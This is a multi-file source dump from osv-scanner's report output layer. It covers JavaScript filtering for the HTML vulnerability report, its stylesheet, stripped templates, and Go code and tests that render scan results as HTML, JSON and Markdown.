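  ecosystemElements.forEach(ecosystemElement => {
    const vulnElements = ecosystemElement.querySelectorAll(".vuln-tr");
    vulnElements.forEach(vuln => {
      if (vuln.classList.contains("uncalled-tr")) {
        vuln.classList.toggle("hide-block", !selectedUncalled);
      }
      if (
        (ecosystemElement.classList.contains("os-type") && !selectedOS) ||
        (ecosystemElement.classList.contains("project-type") &&
          !selectedProject)
      ) {
        vuln.classList.add("hide-block");
      }
    });
  });
}

// Hides the vulnerability rows of packages that belong to another layer.
function applyLayerFilter(selectedLayerID) {
  const tableRows = document.querySelectorAll("tr.has-layer-info");
  tableRows.forEach(row => {
    const rowLayerID = row.getAttribute("data-layer");
    if (selectedLayerID !== "all" && rowLayerID !== selectedLayerID) {
      const packageDetails = document.getElementById(`${row.id}-details`);
      const vulnElements = packageDetails.querySelectorAll(".vuln-tr");
      vulnElements.forEach(vuln => {
        vuln.classList.add("hide-block");
      });
    }
  });
}

// Rebuilds the type filter label and the selected vulnerability count from the
// state of the type checkboxes.
function updateTypeFilterText() {
  const typeSelected = document.getElementById("type-filter-selected");
  const selectedVulnCount = document.getElementById("selected-count");
  const allTypeCheckbox = document.getElementById("all-type-checkbox");
  const osTypeCheckbox = document.getElementById("os-type-checkbox");
  const projectTypeCheckbox = document.getElementById("project-type-checkbox");
  const uncalledTypeCheckbox = document.getElementById(
    "uncalled-type-checkbox"
  );

  let selectedText = "";
  let selectedCount = 0;

  if (projectTypeCheckbox && projectTypeCheckbox.checked) {
    selectedText += `${selectedText ? ", " : ""}Project`;
    selectedCount += readCount(projectTypeCheckbox, "data-type-project-count");
  }
  if (osTypeCheckbox && osTypeCheckbox.checked) {
    selectedText += `${selectedText ? ", " : ""}OS`;
    selectedCount += readCount(osTypeCheckbox, "data-type-os-count");
  }
  if (uncalledTypeCheckbox && uncalledTypeCheckbox.checked) {
    selectedText += `${selectedText ? ", " : ""}Unimportant`;
    selectedCount += readCount(
      uncalledTypeCheckbox,
      "data-type-uncalled-count"
    );
  }

  if (
    allTypeCheckbox &&
    allTypeCheckbox.checked &&
    uncalledTypeCheckbox &&
    !uncalledTypeCheckbox.checked
  ) {
    selectedText = "Default";
  }

  typeSelected.textContent = selectedText;
  selectedVulnCount.textContent = selectedCount;
}

// Restores the filter labels, counts and checkboxes to their initial state.
function resetFilterText() {
  const layerSelected = document.getElementById("layer-filter-selected");
  const allLayerCheckedBox = document.getElementById("all-layer-checkbox");
  if (layerSelected) {
    layerSelected.textContent = `All layers (${allLayerCheckedBox.getAttribute("data-layer-all-count")})`;
  }

  const typeSelected = document.getElementById("type-filter-selected");
  const selectedVulnCount = document.getElementById("selected-count");
  const allTypeCheckedBox = document.getElementById("all-type-checkbox");
  const uncalledTypeCheckBox = document.getElementById(
    "uncalled-type-checkbox"
  );

  if (allTypeCheckedBox) {
    typeSelected.textContent = "Default";
    selectedVulnCount.textContent = allTypeCheckedBox.getAttribute(
      "data-type-all-count"
    );
    if (allLayerCheckedBox) {
      allLayerCheckedBox.checked = true;
    }
    uncalledTypeCheckBox.checked = false;
  } else {
    // Without an "all" checkbox only the project type is offered.
    const projectTypeCheckedBox = document.getElementById(
      "project-type-checkbox"
    );
    projectTypeCheckedBox.checked = true;
    typeSelected.textContent = "Default";
    selectedVulnCount.textContent = projectTypeCheckedBox.getAttribute(
      "data-type-project-count"
    );
    uncalledTypeCheckBox.checked = false;
  }
}

// Clears the search box and, if it held a term, shows all vulnerabilities.
function resetSearchText() {
  const vulnSearchInput = document.getElementById("vuln-search");
  if (vulnSearchInput.value !== "") {
    vulnSearchInput.value = "";
    showAllVulns();
  }
}

// Re-checks the default type checkboxes (all, project, OS) and unchecks
// "uncalled". Does nothing when the "all" checkbox is absent.
function resetTypeCheckbox() {
  const allTypeCheckbox = document.getElementById("all-type-checkbox");
  const osTypeCheckbox = document.getElementById("os-type-checkbox");
  const projectTypeCheckbox = document.getElementById("project-type-checkbox");
  const uncalledTypeCheckbox = document.getElementById(
    "uncalled-type-checkbox"
  );

  if (allTypeCheckbox) {
    allTypeCheckbox.checked = true;
    projectTypeCheckbox.checked = true;
    if (osTypeCheckbox) {
      osTypeCheckbox.checked = true;
    }
    uncalledTypeCheckbox.checked = false;
  }
}

document.addEventListener("DOMContentLoaded", () => {
  resetFilterText();
  showAndHideParentSections();

  // Implement filter for vulnerability types
  const typeFilterOptions = document.getElementById(
    "type-filter-option-container"
  );
  typeFilterOptions.addEventListener("change", event => {
    resetSearchText();
    const changedElement = event.target;
    const allTypesCheckbox = document.getElementById("all-type-checkbox");
    const projectCheckbox = document.getElementById("project-type-checkbox"); // Project vulnerabilities
    const osCheckbox = document.getElementById("os-type-checkbox"); // OS vulnerabilities
    const uncalledCheckbox = document.getElementById("uncalled-type-checkbox"); // Uncalled vulnerabilities (labelled "Unimportant")

    selectedTypeFilterValue.clear();

    if (allTypesCheckbox !== null) {
      if (changedElement === allTypesCheckbox) {
        // The "all" checkbox drives both the OS and the project checkbox.
        osCheckbox.checked = allTypesCheckbox.checked;
        projectCheckbox.checked = allTypesCheckbox.checked;
        if (allTypesCheckbox.checked === true) {
          selectedTypeFilterValue.add("all");
        }
      }
      if (osCheckbox.checked === false || projectCheckbox.checked === false) {
        allTypesCheckbox.checked = false;
      }
      if (osCheckbox.checked) {
        selectedTypeFilterValue.add("os");
      }
    }
    if (projectCheckbox.checked) {
      selectedTypeFilterValue.add("project");
    }
    if (uncalledCheckbox.checked) {
      selectedTypeFilterValue.add("uncalled");
    }

    applyFilters(selectedTypeFilterValue, selectedLayer);
  });

  // Implement layer filter
  const layerFilterOptionsContainer = document.getElementById(
    "layer-filter-option-container"
  );
  if (layerFilterOptionsContainer) {
    layerFilterOptionsContainer.addEventListener("click", event => {
      const clickedOption = event.target.closest(".layer-filter-option");
      if (clickedOption) {
        resetSearchText();
        selectedLayer = clickedOption.getAttribute("data-layer-hash");
        const selectedDisplay = document.getElementById(
          "layer-filter-selected"
        );
        const layerCommand = clickedOption.querySelector("p:first-child");
        selectedDisplay.textContent = layerCommand.textContent;
        hideAllFilterOptions();
        applyFilters(selectedTypeFilterValue, selectedLayer);
      }
    });
  }

  // Hide filter options when clicking other parts
  const filterSections = document.querySelectorAll("div.filter");
  document.addEventListener("click", event => {
    if (![...filterSections].some(c => c.contains(event.target))) {
      hideAllFilterOptions();
    }
  });

  // Search bar
  const vulnSearchInput = document.getElementById("vuln-search");
  vulnSearchInput.addEventListener("keyup", () => {
    // Searching resets the type and layer filters to their defaults.
    resetFilterText();
    selectedTypeFilterValue.clear();
    selectedTypeFilterValue.add("all");
    selectedLayer = "all";
    resetTypeCheckbox();

    const searchTerm = vulnSearchInput.value.trim().toLowerCase();
    const vulnRows = document.querySelectorAll("[data-vuln-id]");
    if (searchTerm === "") {
      showAllVulns();
      return;
    }

    // The term is only compared as a plain substring of the row's ID.
    vulnRows.forEach(row => {
      const vulnID = row.getAttribute("data-vuln-id").toLowerCase();
      row.classList.toggle("hide-block", !vulnID.includes(searchTerm));
    });
    showAndHideParentSections();
  });

  // Implement tooltips
  document.querySelectorAll(".tooltip").forEach(elem => {
    elem.addEventListener("mouseover", () => {
      const rect = elem.getBoundingClientRect();
      const tooltipElem = elem.querySelector(".tooltiptext");
      tooltipElem.style.left = `${rect.left}px`;
      tooltipElem.style.top = `${rect.top}px`;
    });
  });

  showAllVulns();
});
================================================ FILE: internal/output/html/severity_summary_template.gohtml ================================================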

{{ .Critical }}

Critical

{{ .High }}

High

{{ .Medium }}

Medium

{{ .Low }}

Low

{{ .Unknown }}

Unknown
================================================ FILE: internal/output/html/style.css ================================================ body { margin: 0; padding: 0; background: #292929; color: #fff; overflow-y: scroll; font-family: "Overpass Mono", monospace; font-size: 12pt; font-weight: 100; min-width: fit-content; } a { color: inherit; } .container { max-width: 1400px; margin: 50px auto; padding: 20px; border-radius: 4px; box-shadow: 0 0 5px rgba(255, 255, 255, 0.15); min-height: 90vh; } h2 { margin-top: 50px; font-size: 15pt; } h3 { font-size: 12pt; margin-top: 30px; } h1, h2, h3 { font-family: "Overpass Mono", monospace; font-weight: normal; } .ecosystem { margin-top: 20px; } header { display: flex; margin-bottom: 50px; justify-content: space-between; } #header-left { display: flex; align-items: center; } .logo { height: 20px; } #header-left .vl { border-left: 2px solid #fff; height: 25px; margin-left: 20px; margin-right: 20px; } #header-left h1 { font-size: 23px; } #header-right { display: flex; align-items: center; } #header-right ::after { display: inline-block; content: " "; background-image: url(https://osv.dev/static/img/external-link.svg); width: 16px; height: 16px; margin-left: 3px; vertical-align: middle; } .material-icons { vertical-align: middle; transform: rotate(0deg); transition: transform 0.2s ease; user-select: none; } .material-icons.expanded { transform: rotate(90deg); } .vuln-table { width: 100%; text-align: left; margin-bottom: 40px; margin-top: 10px; color: rgba(255, 255, 255, 0.87); border-spacing: 0; } .vuln-table th { border-bottom: 1px solid rgba(255, 255, 255, 0.33); padding: 16px; } .table-tr { line-height: 30px; } .table-tr td { word-break: break-word; width: 200px; padding: 16px; } .table-tr:hover { background-color: rgba(255, 255, 255, 0.04); } .table-tr-details > td { border-bottom: 1px solid rgba(255, 255, 255, 0.2); } .vuln-tr { display: table-row; } .vuln-id { color: #d9534f; } .package-details { text-align: left; padding: 
20px 50px 30px 50px; display: block; max-height: 800px; overflow: auto; background: /* Cover TOP */ linear-gradient(rgb(41, 41, 41) 30%, rgba(41, 41, 41, 0)) center top, /* Cover BOTTOM */ linear-gradient(rgba(41, 41, 41, 0), rgb(41, 41, 41) 70%) center bottom, /* Shadow TOP */ linear-gradient(rgba(0, 0, 0, 0.2), rgba(0, 0, 0, 0)) center top, /* Shadow BOTTOM */ linear-gradient(rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.2)) center bottom; background-repeat: no-repeat; background-size: 100% 40px, 100% 40px, 100% 20px, 100% 20px; background-attachment: local, local, scroll, scroll; } .package-details p { margin-bottom: 10px; margin-top: 10px; } .table-tr:hover .open-in-tab-tag { display: inline; } .open-in-tab-tag { display: none; border: 1px solid rgba(255, 255, 255, 0.12); padding: 5px; border-radius: 4px; width: fit-content; } .open-in-tab-cell { width: 90px !important; cursor: pointer; } .severity-cell { width: 60px !important; user-select: none; } .fixable-tag { border-radius: 4px; max-width: 250px; width: fit-content; padding: 0 5px; white-space: nowrap; overflow: hidden; text-align: center; user-select: none; } .has-fix { white-space: break-spaces; background-color: #6a6a6a; } .no-fix { background-color: #252525; border: 1px solid #3c4043; } .hide-block + .table-tr-details { /* If details is after a hidden block, also hide details */ display: none; } .uncalled-text { color: #808080; } #vuln-tab { display: block; margin-top: 30px; } #tab-switch { text-align: left; border-bottom: 1px solid #6c6c6c; padding-left: 20px; display: flex; margin-bottom: 50px; } .tab-switch-button { width: 180px; outline: 0; cursor: pointer; background-color: transparent; text-align: center; display: flex; } .tab-button-text-container { flex-direction: column; align-items: center; } .tab-button-text-container p { width: 160px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; border-bottom: 2px solid transparent; color: #5f6368; } .tab-switch-button span { cursor: pointer; 
font-size: 16px; display: none; } .tab-switch-button-border { width: 85%; height: 3px; background-color: transparent; margin: auto; } .tab-button-text-container:hover p { color: #fff; } .tab-switch-button-selected:hover span { display: block; } .tab-switch-button-selected .tab-switch-button-border { background-color: #eee; border-top-left-radius: 5px; border-top-right-radius: 5px; } .tab-switch-button-selected p { color: #fff; } .osv-tab { position: relative; } .osv-tab iframe { width: 100%; min-height: 1000px; border: none; } .iframe-spinner { position: absolute; inset: 0; margin: auto; width: 48px; height: 48px; border: 5px solid #fff; border-bottom-color: transparent; border-radius: 50%; display: inline-block; box-sizing: border-box; animation: rotation 1s linear infinite; } .package-tr { cursor: pointer; } .icon-td { width: 10px !important; } #filter-section { display: flex; width: 60%; } .filter-container { margin-right: 20px; max-width: 600px; } .filter { margin-top: 10px; max-width: 600px; min-width: 250px; background-color: transparent; border-radius: 8px; overflow: hidden; color: #fff; border: 1px solid #ddd; display: flex; justify-content: space-between; padding: 0 20px; } #layer-filter { width: 400px !important; } .filter-selected { white-space: nowrap; overflow: hidden; } .filter-option-container { border: 1px solid #ddd; border-radius: 8px; position: absolute; background-color: #292929; min-width: 200px; max-width: 1400px; box-shadow: 0px 8px 16px 0px rgba(0, 0, 0, 0.2); z-index: 1; display: block; } .filter-option { border-bottom: 1px dotted #ddd; padding: 15px 20px; white-space: nowrap; cursor: pointer; display: block; } .filter-option input, .filter-option label { cursor: pointer; } #layer-filter-option-container { width: 1400px; } .layer-filter-option { display: flex; justify-content: space-between; } .filter-option:hover { background-color: rgba(255, 255, 255, 0.04); } .filter-icon i { position: relative; top: 25%; } #summary-section { display: 
flex; justify-content: space-between; width: 100%; } #severity-section { overflow: hidden; } .severity-long { text-align: center; min-width: 100px; overflow: hidden; white-space: nowrap; user-select: none; } .severity-long p { font-size: 10pt; padding: 5px 5px; border-radius: 4px; margin-right: 3px; } .critical { background-color: #ad0300; } .high { background-color: #ffa500; } .medium { background-color: #ffd700; color: #292929; } .low { background-color: #53aa33; color: #292929; } .unknown { background-color: #80868b; } .severity-count-summary { display: flex; } .severity-short { width: 40px; user-select: none; } .severity-short p { text-align: center; } .severity-short-first p { border-top-left-radius: 4px; border-bottom-left-radius: 4px; } .severity-short-last p { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .severity-cell .severity-short p { border-radius: 4px; } /* CSS for the search box */ .search-box { display: flex; align-items: center; width: 100%; border: 1px solid #fff; background-color: transparent; border-radius: 8px; margin-top: 30px; } .search-box input[type="text"] { flex: 1 0 auto; padding: 15px 10px; border: none; background-color: transparent; color: #fff; font-size: 12pt; } .search-box input[type="text"]:focus { outline: none; } .search-icon { height: fit-content; padding: 13px; } .package-detail-title { color: #9aa0a6; } .layer-command-container { display: flex; } .inner-table { width: 100%; border: 0.5px solid rgba(255, 255, 255, 0.12); border-spacing: 0px; border-radius: 4px; } .inner-table th { border-bottom: 0.5px solid rgba(255, 255, 255, 0.12); } .inner-table td { border-bottom: 0.5px solid rgba(255, 255, 255, 0.12); } .expand-icon i.rotated { transform: rotate(90deg); } .tooltip { position: relative; display: inline-block; text-decoration: underline; text-decoration-style: dotted; text-underline-offset: 3px; } .tooltip.no-underline { text-decoration: none; } .tooltip .tooltiptext { visibility: hidden; 
background-color: black; color: #fff; white-space: normal; text-align: left; line-height: 1.5; max-width: 300px; width: max-content; padding: 10px; border-radius: 4px; /* Position the tooltip */ position: fixed; transform: translateY(-100%); z-index: 999; } .tooltip .tooltiptext.layer-tooltiptext { white-space: normal; margin-left: 0; width: 1000px; max-width: 1000px; max-height: 200px; overflow-x: hidden; overflow-y: auto; } .tooltip:hover .tooltiptext { visibility: visible; } .severity-count-summary .tooltip { text-decoration: none; } .flex-box { display: flex; } /* new added */ .base-icon .tooltiptext { margin-left: 0px; background-color: #292929; } div.title { visibility: hidden; } .summary-section { margin-top: 30px; border: 1px solid #fff; border-radius: 8px; padding: 10px 20px; max-height: 400px; overflow-y: visible; overflow-x: hidden; } #base-image-table { width: 100%; } #base-image-table th { text-align: left; height: 30px; } .layer-entry { display: flex; justify-content: space-between; padding: 0 10px; border-bottom: 1px dotted #666666; } .base-image-summary { cursor: pointer; } .base-image-details { display: block; margin-bottom: 20px; } .base-image-title { width: 150px; color: #9aa0a6; height: 20px; } .layer-command { max-width: 1000px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .clickable { cursor: pointer; } .clickable-layer:hover { background-color: rgba(255, 255, 255, 0.04); } .source-path { border: 1px #888 solid; border-radius: 4px; padding: 5px; background-color: rgba(0, 0, 0, 0.2); line-height: 2; } .hide-block { display: none !important; } #license-summary-details { margin-left: 30px; } #deprecated-packages-details { margin-left: 30px; } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } ================================================ FILE: internal/output/html/vuln_table_entry_template.gohtml ================================================ {{ $index := uniqueID }} {{ $element 
:= .Element }} {{ if eq (len $element.GroupIDs) 1 }}
{{ $element.ID }}
{{ else }}
{{ $element.ID }}
Group IDs:
{{ range $rowIndex, $alias := $element.GroupIDs }} {{ $alias }}
{{ end }}
{{ end }} {{ if eq (len $element.Aliases) 1 }} {{ index $element.Aliases 0 }} {{ else if gt (len $element.Aliases) 1}}
{{ index $element.Aliases 0}}, ... {{ range $rowIndex, $alias := $element.Aliases }} {{ $alias }}
{{ end }}
{{ else }} No Aliases {{ end }}

{{$element.FixedVersion }}

{{ $element.SeverityScore }}

Open in tab

================================================ FILE: internal/output/html/vuln_table_template.gohtml ================================================ {{ range $rowIndex, $element := .RegularVulns }} {{$args := buildVulnTableEntryArgument $element false}} {{template "vuln_table_entry_template.gohtml" $args}} {{ end }} {{ range $rowIndex, $element := .HiddenVulns }} {{ $index := uniqueID }} {{$args := buildVulnTableEntryArgument $element true}} {{template "vuln_table_entry_template.gohtml" $args}} {{ end }}
Vulnerability ID Aliases / Upstream Fixed version Severity
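================================================ FILE: internal/output/html.go ================================================
package output

import (
	"embed"
	"html/template"
	"io"
	"strings"

	"github.com/google/osv-scanner/v2/internal/utility/results"
	"github.com/google/osv-scanner/v2/internal/utility/severity"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// TemplateDir is the directory containing the HTML templates
const TemplateDir = "html/*"

//go:embed html/*
var templates embed.FS

// uniqueIndex creates a function that generates unique indices for HTML elements.
// It takes an integer pointer as input and increments the integer's value each time the
// returned function is called, so successive calls return 1, 2, 3, ... for a counter
// that starts at zero.
//
// The increment is a plain read-modify-write with no synchronisation, so the returned
// function is NOT safe for concurrent use. PrintHTMLResults gives every report its own
// counter, so separate reports do not share state.
func uniqueIndex(index *int) func() int {
	return func() int {
		*index++
		return *index
	}
}

// formatSlice joins the elements with ", ".
func formatSlice(slice []string) string {
	return strings.Join(slice, ", ")
}

// formatLicense renders a list of licenses as a ", "-separated string.
func formatLicense(slice []models.License) string {
	stringSlice := make([]string, len(slice))
	for i, license := range slice {
		stringSlice[i] = string(license)
	}

	return formatSlice(stringSlice)
}

// formatRating returns the severity rating in lower case.
func formatRating(rating severity.Rating) string {
	return strings.ToLower(string(rating))
}

// VulnTableEntryArgument is the data passed to vuln_table_entry_template.gohtml.
type VulnTableEntryArgument struct {
	Element  VulnResult
	IsHidden bool
}

// buildVulnTableEntryArgument bundles a vulnerability with its hidden flag so both
// can be handed to a template as a single value.
func buildVulnTableEntryArgument(element VulnResult, isHidden bool) VulnTableEntryArgument {
	return VulnTableEntryArgument{
		IsHidden: isHidden,
		Element:  element,
	}
}

// hasOSResult reports whether at least one ecosystem is marked as an OS ecosystem.
func hasOSResult(ecosystems []EcosystemResult) bool {
	for _, ecosystem := range ecosystems {
		if ecosystem.IsOS {
			return true
		}
	}

	return false
}

// PrintHTMLResults renders the scan results as an HTML report and writes it to
// outputWriter.
//
// Rendering goes through html/template, and the helpers defined in this file return
// plain strings rather than template.HTML, so scan data such as package names and
// vulnerability IDs is escaped for the context it is inserted into. A helper that
// returns template.HTML, template.JS or template.URL would bypass that escaping and
// needs its own review.
//
// It returns an error if the embedded templates cannot be parsed or if executing
// report_template.gohtml fails.
func PrintHTMLResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error {
	result := BuildResults(vulnResult)
	// Per-call counter: element IDs are unique within one rendered report.
	vulnIndex := 0

	// Parse embedded templates
	funcMap := template.FuncMap{
		"uniqueID":                    uniqueIndex(&vulnIndex),
		"join":                        strings.Join,
		"formatRating":                formatRating,
		"add":                         func(a, b int) int { return a + b },
		"getFilteredVulnReasons":      getFilteredVulnReasons,
		"getBaseImageName":            getBaseImageName,
		"formatSlice":                 formatSlice,
		"formatLayerCommand":          formatLayerCommand,
		"buildVulnTableEntryArgument": buildVulnTableEntryArgument,
		"formatLicense":               formatLicense,
		"hasOSResult":                 hasOSResult,
		"GetShortCommit":              results.GetShortCommit,
		"isOSResult":                  isOSResult,
	}

	// Report a parse failure through the error return instead of panicking: callers
	// already handle an error from this function.
	tmpl, err := template.New("").Funcs(funcMap).ParseFS(templates, TemplateDir)
	if err != nil {
		return err
	}

	// Execute template
	return tmpl.ExecuteTemplate(outputWriter, "report_template.gohtml", result)
}
================================================ FILE: internal/output/html_test.go ================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
)

// These tests only check that rendering succeeds; the HTML itself is not compared
// against a snapshot.

func TestPrintHTMLResults_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		err := output.PrintHTMLResults(args.vulnResult, outputWriter)

		if err != nil {
			t.Errorf("Error writing HTML output: %s", err)
		}
	})
}

func TestPrintHTMLResults_WithLicenseViolations(t *testing.T) {
	t.Parallel()

	testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		err := output.PrintHTMLResults(args.vulnResult, outputWriter)

		if err != nil {
			t.Errorf("Error writing HTML output: %s", err)
		}
	})
}

func TestPrintHTMLResults_WithMixedIssues(t *testing.T) {
	t.Parallel()

	testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		outputWriter := &bytes.Buffer{}
		err := output.PrintHTMLResults(args.vulnResult, outputWriter)

		if err != nil {
			t.Errorf("Error writing HTML output: %s", err)
		}
	})
}
================================================ FILE: internal/output/machinejson.go ================================================
package output

import (
	"encoding/json"
	"io"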
"github.com/google/osv-scanner/v2/pkg/models" ) // PrintJSONResults writes results to the provided writer in JSON format func PrintJSONResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { encoder := json.NewEncoder(outputWriter) encoder.SetIndent("", " ") return encoder.Encode(vulnResult) } ================================================ FILE: internal/output/machinejson_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestPrintJSONResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintJSONResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } func TestPrintJSONResults_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintJSONResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("Error writing JSON output: %s", err) } testutility.NewSnapshot().MatchText(t, outputWriter.String()) }) } ================================================ FILE: internal/output/markdowntable.go ================================================ package output import ( "fmt" "io" 
"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/jedib0t/go-pretty/v6/table"
	"github.com/jedib0t/go-pretty/v6/text"
)

// PrintMarkdownTableResults renders the osv scan results as Markdown tables on outputWriter,
// using the same format and columns as the standard table output.
//
// The vulnerability table is always attempted; the license summary, license violation and
// deprecated-package tables are emitted only when the corresponding config or count asks for them.
//
// NOTE(review): text.DisableColors() is called and never undone here; it looks like a
// process-wide go-pretty switch, so confirm no later output in the same process expects colours.
// NOTE(review): cell values (package names, versions, vulnerability summaries) originate from
// scanned manifests and advisory data. Whatever escaping is applied happens in tableBuilder and
// RenderMarkdown, which are not visible here; confirm it is adequate wherever this Markdown is
// rendered as HTML (for example in pull-request comments).
func PrintMarkdownTableResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer, showAllVulns bool) {
	text.DisableColors()

	summary := BuildResults(vulnResult)

	// A leading blank line keeps the report apart from any preceding log output.
	fmt.Fprintln(outputWriter)

	if summary.IsContainerScanning {
		fmt.Fprintf(outputWriter, "%s:\n", GetContainerScanningHeader(summary))
	}
	printSummary(summary, outputWriter)

	// Every table mirrors its rendered output to outputWriter.
	newTable := func() table.Writer {
		tw := table.NewWriter()
		tw.SetOutputMirror(outputWriter)

		return tw
	}

	if vulnTable := tableBuilder(newTable(), summary, showAllVulns); vulnTable.Length() != 0 {
		vulnTable.RenderMarkdown()
	}

	licenses := vulnResult.ExperimentalAnalysisConfig.Licenses

	if licenses.Summary {
		if summaryTable := licenseSummaryTableBuilder(newTable(), vulnResult); summaryTable.Length() != 0 {
			summaryTable.RenderMarkdown()
		}
	}

	if len(licenses.Allowlist) > 0 {
		if violationsTable := licenseViolationsTableBuilder(newTable(), vulnResult); violationsTable.Length() > 0 {
			violationsTable.RenderMarkdown()
		}
	}

	if summary.PkgDeprecatedCount > 0 {
		deprecatedTable := deprecatedPackagesTableBuilder(newTable(), vulnResult)
		// The one-line summary is written first, then the table itself.
		printPkgDeprecatedSummary(summary, outputWriter)
		deprecatedTable.RenderMarkdown()
	}
}

================================================
FILE: internal/output/markdowntable_test.go
================================================
package output_test

import (
	"bytes"
	"testing"

	"github.com/google/osv-scanner/v2/internal/output"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// Snapshot test: Markdown output for results containing vulnerabilities, with all vulns shown.
func TestPrintMarkdownTableResults_WithVulnerabilities(t *testing.T) {
	t.Parallel()

	testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		var buf bytes.Buffer
		output.PrintMarkdownTableResults(args.vulnResult, &buf, true)

		testutility.NewSnapshot().MatchText(t, buf.String())
	})
}

// Snapshot test: Markdown output for results containing license violations.
func TestPrintMarkdownTableResults_WithLicenseViolations(t *testing.T) {
	t.Parallel()

	testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		var buf bytes.Buffer
		output.PrintMarkdownTableResults(args.vulnResult, &buf, false)

		testutility.NewSnapshot().MatchText(t, buf.String())
	})
}

// Snapshot test: Markdown output for results mixing vulnerabilities and license violations.
func TestPrintMarkdownTableResults_WithMixedIssues(t *testing.T) {
	t.Parallel()

	testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) {
		t.Helper()

		var buf bytes.Buffer
		output.PrintMarkdownTableResults(args.vulnResult, &buf, false)

		testutility.NewSnapshot().MatchText(t, buf.String())
	})
}

================================================
FILE: internal/output/output_result.go
================================================
package output

import (
	"cmp"
	"encoding/json"
	"fmt"
	"io"
	"slices"
	"sort"
	"strings"

	"github.com/google/osv-scalibr/inventory/vex"
	"github.com/google/osv-scalibr/semantic"
	"github.com/google/osv-scanner/v2/internal/cachedregexp"
	"github.com/google/osv-scanner/v2/internal/identifiers"
	"github.com/google/osv-scanner/v2/internal/utility/results"
	"github.com/google/osv-scanner/v2/internal/utility/severity"
	"github.com/google/osv-scanner/v2/pkg/models"
"github.com/jedib0t/go-pretty/v6/text"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// Result represents the vulnerability scanning results for output report.
type Result struct {
	// Ecosystems is ordered by buildResult: project ecosystems sorted by name, followed by
	// OS ecosystems sorted by name.
	Ecosystems []EcosystemResult
	// Container scanning related
	// IsContainerScanning is set by populateResultWithImageMetadata when the image metadata
	// contains at least one layer.
	IsContainerScanning bool
	ImageInfo           ImageInfo
	LicenseSummary      LicenseSummary
	VulnTypeSummary     VulnTypeSummary
	PackageTypeCount    AnalysisCount
	VulnCount           VulnCount
	PkgDeprecatedCount  int `json:",omitempty"`
}

// EcosystemResult represents the vulnerability scanning results for an ecosystem.
type EcosystemResult struct {
	Name    string
	Sources []SourceResult
	// IsOS is set by buildResult when isOSEcosystem reports true for Name.
	IsOS bool
}

// SourceResult represents the vulnerability scanning results for a source file.
type SourceResult struct {
	Name string
	Type models.SourceType
	// PackageTypeCount counts packages (not vulnerabilities): a package with both regular and
	// hidden vulnerabilities is counted once in each bucket (see processSource).
	PackageTypeCount       AnalysisCount
	Packages               []PackageResult
	VulnCount              VulnCount
	LicenseViolationsCount int
	PkgDeprecatedCount     int `json:",omitempty"`
}

// PackageResult represents the vulnerability scanning results for a package.
type PackageResult struct {
	Name string
	// OSPackageNames represents the actual installed binary names. This is primarily used for container scanning.
	OSPackageNames   []string
	InstalledVersion string
	Commit           string
	// FixedVersion is computed by calculatePackageFixedVersion from the regular vulnerabilities;
	// it is UnfixedDescription when none of them is fixable.
	FixedVersion string
	// RegularVulns holds all the vulnerabilities that should be displayed to users
	RegularVulns []VulnResult
	// HiddenVulns holds all the vulnerabilities that should not be displayed to users, such as those deemed unimportant or uncalled.
	HiddenVulns       []VulnResult
	LayerDetail       PackageContainerInfo
	VulnCount         VulnCount
	Licenses          []models.License
	LicenseViolations []models.License
	// DepGroups is excluded from JSON output (json:"-").
	DepGroups  []string `json:"-"`
	Deprecated bool     `json:",omitempty"`
}

// VulnResult represents a single vulnerability.
type VulnResult struct {
	// ID is the representative ID of the vulnerability group (the first entry of GroupIDs,
	// see processVulnGroups).
	ID       string
	GroupIDs []string
	// Aliases lists the group's aliases other than ID; processVulnGroups fills it only when
	// ID itself appears among the group's aliases.
	Aliases []string
	// Description is either the Vulnerability.Summary (default) or the Vulnerability.Details.
	Description string
	IsFixable   bool
	// FixedVersion is the value returned by getNextFixVersion: a version string,
	// UnfixedDescription, or VersionUnsupported.
	FixedVersion     string
	VulnAnalysisType VulnAnalysisType
	SeverityRating   severity.Rating
	// SeverityScore is replaced with "N/A" by processVulnGroups when the rating is unknown.
	SeverityScore string
}

// ImageInfo holds the image-level data that populateResultWithImageMetadata attaches to a Result:
